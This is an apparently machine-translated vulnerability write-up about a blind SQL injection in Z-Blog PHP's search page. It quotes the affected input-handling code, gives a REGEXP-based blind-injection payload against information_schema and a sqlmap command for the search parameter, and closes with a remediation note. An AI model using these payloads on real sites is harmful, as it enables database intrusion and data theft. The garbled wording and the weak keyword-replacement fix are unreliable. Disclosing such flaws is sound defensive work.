Z-Blog php version foreground regular SQL blind Injection

The problem lies in/zb_system/function/c_system_common.php.

function GetVars($name,$type='REQUEST'){if ($type=='ENV') {$array=&$_ENV;}if ($type=='GET') {$array=&$_GET;}if ($type=='POST') {$array=&$_POST;}if ($type=='COOKIE') {$array=&$_COOKIE;}if ($type=='REQUEST') {$array=&$_REQUEST;}if ($type=='SERVER') {$array=&$_SERVER;}if ($type=='SESSION') {$array=&$_SESSION;}if ($type=='FILES') {$array=&$_FILES;}if(isset($array[$name])){var_dump($array[$name]);return $array[$name];}else{return null;}}

 

After the GET data is filtered, it enters dbsql. in php, enter the injection statement in the search box at the front end. h is the searched character h % ') and 1) # and 1 can be replaced with SQL injection, here we use regular expression blind note h % ') and 1 = (SELECT 1 FROM information_schema.tables WHERE TABLE_SCHEMA = "zblog" AND table_name REGEXP' ^ [a-z] 'limit 0, 1 )) # Read data by character .. manual injection is too painful to use sqlmap python sqlmap. py-u website address/search. php? Q = the character-p that can be successfully searched -- prefix "% ')" -- suffix ")#"


I want to ask why I want to convert \ 'back to the rhythm of injection? Zblog/zb_system/function/c_system_base.php

function _stripslashes(&$val) {if(!is_array($val)) return stripslashes($val);foreach($val as $k => &$v) $val[$k] = _stripslashes($v);return $val;}if(get_magic_quotes_gpc()){_stripslashes($_GET);_stripslashes($_POST);_stripslashes($_COOKIE);}

 

Solution:Use mysql_real_escape_string () or addslashes () to filter input parameters, or use str_replace () to replace some keywords.